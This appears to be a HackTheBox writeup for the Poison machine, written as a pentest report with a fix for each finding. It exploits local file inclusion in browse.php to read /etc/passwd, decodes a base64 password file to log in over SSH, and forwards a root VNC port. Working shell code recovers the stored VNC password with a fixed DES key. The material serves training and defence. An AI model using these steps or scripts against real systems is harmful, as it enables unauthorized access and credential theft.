Poison CTF Writeup
Writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Poison CTF from HackTheBox.
Poison CTF
Poison CTF is a machine that focuses mainly on log poisoning and port forwarding/tunneling. It runs FreeBSD, which presents a few challenges for novice users, as many binaries that are common on Linux distributions are not available.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
Executive Summary
Introduction
This Pentest report documents the security assessment conducted on the IP address 10.10.10.84. The assessment aimed to identify vulnerabilities that could be exploited to compromise the security of the target infrastructure.
Objective
The objective of this security assessment was to identify and exploit vulnerabilities in the target's infrastructure to evaluate existing security measures and provide recommendations to mitigate the identified risks.
Requirements
- Identify vulnerabilities in the web application hosted at IP address 10.10.10.84.
- Exploit critical and moderate vulnerabilities to assess potential exposure to attacks.
- Evaluate the possibility of unauthorized access to systems and data.
High-Level Summary of Found Vulnerabilities
Web Server Enumeration
- Local File Inclusion (Elevated): Local files of the system could be included by abusing a flaw in browse.php. To mitigate this, implement input validation and sanitize user input in the browse.php script to prevent directory traversal attacks. Additionally, restrict file access to a specific directory and implement a whitelist of allowed files that can be accessed through the script.
- Sensitive Information Exposure (Elevated): A file (pwdbackup.txt) containing sensitive information was identified, base64 encoded. To improve security, avoid storing sensitive information like passwords or credentials in plain text or base64 encoding; base64 is an encoding, not encryption, and anyone who can read the file can decode it. Use encryption and secure storage methods. Implement proper access controls to restrict access to sensitive files and directories.
Initial Access - Exposed SSH Credentials
- Exposed SSH Credentials (High): Credentials for the user "charix" were decoded, allowing unauthorized SSH access. To mitigate this, immediately change the passwords for user "charix."
Post Exploitation
- LPE to root (Local Privilege Escalation to root) (Extreme): Credentials for the root user's VNC session were discovered in /home/charix/secret.zip. A tool called vncpwd was used to recover the stored VNC password (VNC stores it as a single DES block under a fixed, publicly known key, so the stored form offers no real protection), enabling remote access to the system as root. To prevent this, use secure storage mechanisms and encryption for sensitive data, and review and restrict access to critical files like /home/charix/secret.zip.
Recommendations
- Implement input validation and sanitize user input in the browse.php script to prevent directory traversal attacks. Restrict file access to a specific directory and implement a whitelist of allowed files.
- Avoid storing sensitive information in plain text or base64 encoding. Use encryption and secure storage methods for sensitive data and implement proper access controls to restrict access to sensitive files and directories.
- Immediately change the passwords for user "charix" to prevent unauthorized SSH access.
- Securely store sensitive data such as VNC passwords using encryption. Review and restrict access to critical files to prevent unauthorized disclosure of sensitive information.
Methodology
The assessment involved service enumeration, web server enumeration, and post-exploitation activities. Vulnerabilities in local file inclusion, sensitive information exposure, exposed SSH credentials, and local privilege escalation to root were identified and exploited. Recommendations focus on improving security measures to mitigate the identified risks.
Color Legend
Console color legend:
Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity
Risk Classification
Independent Challenge - 10.10.10.84
export IP=10.10.10.84
Service Enumeration
| IP Address | Ports Open |
|---|---|
| 10.10.10.84 | TCP: 22, 80 |
Web Server Enumeration
Local File Inclusion
Vulnerability Explanation: Behind Security was able to include local files of the system by abusing a flaw in browse.php.
Vulnerability Fix:
- Input Validation: Implement input validation and sanitize user input in the browse.php script to prevent directory traversal attacks.
- File Whitelisting: Restrict file access to a specific directory and implement a whitelist of allowed files that can be accessed through the script.
Severity: Elevated
Steps to Reproduce the Attack:
- Go to http://10.10.10.84/browse.php?file=/etc/passwd. You can change /etc/passwd for any file the web server process is allowed to read; an absolute path is accepted directly, so no traversal sequences are needed.
Sensitive Information Exposure
Vulnerability Explanation: Behind Security was able to identify the presence of a file (pwdbackup.txt) containing sensitive information, base64 encoded. Base64 is not a recommended way for storing sensitive information: it is an encoding rather than encryption and can be trivially decoded.
Vulnerability Fix:
- Secure Sensitive Information: Avoid storing sensitive information like passwords or credentials in plain text or base64 encoding. Use encryption and secure storage methods.
- Access Controls: Implement proper access controls to restrict access to sensitive files and directories.
Severity: Elevated
Steps to Reproduce the Attack:
- Get the file at
http://10.10.10.84/pwdbackup.txt
Initial Access - Exposed SSH Credentials
Vulnerability Explanation: Behind Security decoded credentials for the user "charix" and was able to log in via SSH.
Vulnerability Fix:
- Change Passwords: Immediately change the passwords for user "charix".
Severity: High
Steps to Reproduce the Attack:
- Get the contents of http://10.10.10.84/pwdbackup.txt
- Remove the spaces and save the encoded content to a file (in this case, named "encoded.enc").
- Decode the file by executing the bash script below.
- Use the decoded password to log in as "charix" via SSH: ssh charix@10.10.10.84 (the "charix" username can be validated by reading the /etc/passwd file and searching for users with access to csh; the relevant fields of the entry look like this: charix:/home/charix:/bin/csh).
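The decoding step above and the /etc/passwd check, as an added shell example (this is not the writeup's own script, which is not reproduced on the page). The page does not state how many base64 layers pwdbackup.txt carries, so `peel_base64` loops until the text stops looking like base64; `shell_users` applies the "users with a login shell" rule to passwd text such as the copy fetched through the browse.php LFI. The sample password and the passwd excerpt are constructed for the demo, not data from the target.

```shell
#!/bin/sh
# Added example for the "Initial Access" steps (not the writeup's own
# script). Two helpers:
#   peel_base64  strips repeated layers of base64. It loops until the text
#                stops looking like base64: a real password usually contains
#                characters such as '!' or '#' that base64 never uses.
#   shell_users  lists accounts with a login shell from /etc/passwd text,
#                which is how the "charix" username is confirmed above.

# Usage: peel_base64 < encoded.enc   (spaces and newlines are tolerated)
peel_base64() {
  cur=$(tr -d ' \t\r\n')             # the "remove the spaces" step
  depth=0
  while printf '%s' "$cur" | grep -Eq '^[A-Za-z0-9+/]+={0,2}$'; do
    # base64 -d exits non-zero on malformed input: treat that as "done".
    next=$(printf '%s' "$cur" | base64 -d 2>/dev/null) || break
    cur=$(printf '%s' "$next" | tr -d '\r\n')
    depth=$((depth + 1))
    # Caveat: a password made only of base64 characters would be decoded one
    # layer too far; the depth cap also stops runaway loops on such input.
    [ "$depth" -lt 64 ] || break
  done
  printf '%s\n' "$cur"
}

# Usage: shell_users < passwd_text
# Prints user:home:shell for entries whose login shell ends in "sh"
# (/bin/csh, /bin/sh, ...); nologin and false entries fail that rule.
shell_users() {
  awk -F: '$7 ~ /sh$/ { print $1 ":" $6 ":" $7 }'
}

# Constructed sample data (not from the target): "hunter2!" wrapped in three
# base64 layers, and a FreeBSD-style passwd excerpt.
SAMPLE_ENC=$(printf '%s' 'hunter2!' | base64 | base64 | base64)
SAMPLE_PASSWD='root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh'

printf 'decoded: %s\n' "$(printf '%s\n' "$SAMPLE_ENC" | peel_base64)"
printf '%s\n' "$SAMPLE_PASSWD" | shell_users
```

On the real file, run `peel_base64 < encoded.enc` after saving the page content as described; the stopping rule is a heuristic, so if the output still looks like base64 or like binary, inspect it and adjust the depth by hand.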
Post Exploitation
LPE to root
Vulnerability Explanation: After analyzing the processes running on the machine, a VNC instance running as root stood out. Credentials for the root user's VNC session could be found when extracting the contents of /home/charix/secret.zip (the zip file is password protected, but that isn't a big deal, as it is the same password we discovered for user "charix"). The VNC service is not reachable on an external port (only 22 and 80 are open), so it has to be reached through an SSH port forward; using a specific tool to recover the stored VNC password then lets a remote attacker log in as root via VNC, taking complete control over the system.
Vulnerability Fix:
- Password Storage: Use secure storage mechanisms and encryption for sensitive data.
- Access Controls: Review and restrict access to critical files like /home/charix/secret.zip.
Severity: Extreme
Steps to Reproduce the Attack:
- Download vncpwd to your local machine and compile it (cd vncpwd && make); we'll use it to recover the stored VNC password.
- Transfer /home/charix/secret.zip to your machine and unzip it. When prompted for a password, use the password for "charix" that we discovered before.
- Set up an SSH port forward using the credentials for user "charix": ssh -L 5901:localhost:5901 charix@10.10.10.84.
- Use ./vncpwd /path/to/vnc/stored/password to recover the VNC password.
- Use a tool like vncviewer to connect to the VNC server using the recovered password. Note that we have port forwarding active via SSH, so localhost:5901 will be the server address.
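What vncpwd does under the hood, as an added shell example that is not the writeup's tool: VNC stores a password as one 8-byte DES block under a fixed, publicly known key, so openssl alone recovers it. The key bytes and the bit-reversal rule below are standard VNC facts, not something taken from this page; the sample password is constructed for the demo, and the example assumes an openssl binary is installed (with the legacy provider available on OpenSSL 3, where single DES was moved out of the default provider).

```shell
#!/bin/sh
# Added example, not the writeup's vncpwd: recover a stored VNC password with
# openssl alone, and build a sample file offline to prove the round trip.
# VNC "encrypts" the 8-byte password as one DES block under a fixed, publicly
# known key (0x17 0x52 0x6b 0x06 0x23 0x4e 0x58 0x07). VNC's DES consumes
# key bits in reversed order per byte, so the equivalent key for a standard
# DES implementation is each byte bit-reversed: e8 4a d6 60 c4 72 1a e0.
VNC_KEY=e84ad660c4721ae0

# Single DES with -nopad (the file is exactly one block). On OpenSSL 3 single
# DES lives in the legacy provider, so retry with it loaded if refused.
vnc_des() {
  openssl enc -des-ecb -nopad -K "$VNC_KEY" "$@" 2>/dev/null \
    || openssl enc -des-ecb -nopad -K "$VNC_KEY" -provider legacy -provider default "$@"
}

# Usage: vnc_decrypt /path/to/stored/password  -> prints the cleartext
# VNC pads short passwords with NUL bytes; tr strips them again.
vnc_decrypt() {
  vnc_des -d -in "$1" | tr -d '\000'
}

# Usage: vnc_encrypt 'cleartext' /path/out  -> writes the 8-byte file
# Only needed to construct a sample: truncates to 8 chars and NUL-pads,
# which is what VNC does before storing a password.
vnc_encrypt() {
  { printf '%s' "$1" | head -c 8; printf '\0\0\0\0\0\0\0\0'; } | head -c 8 \
    | vnc_des -e -out "$2"
}

# Demo with a constructed password (no real target data).
sample=$(mktemp)
vnc_encrypt 'hunter2!' "$sample"
printf 'stored (hex): %s\n' "$(od -An -tx1 "$sample" | tr -d ' \n')"
printf 'recovered:    %s\n' "$(vnc_decrypt "$sample")"
rm -f "$sample"
```

Two practical notes: VNC truncates passwords to 8 characters before storing them, so the recovered value is at most 8 characters even if the user typed more, and a TigerVNC-style vncviewer accepts the obfuscated file directly via `-passwd /path/to/file`, so recovering the cleartext is a convenience rather than a requirement for the login over the SSH forward.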
Conclusion
We hope you have found our content on Poison CTF useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.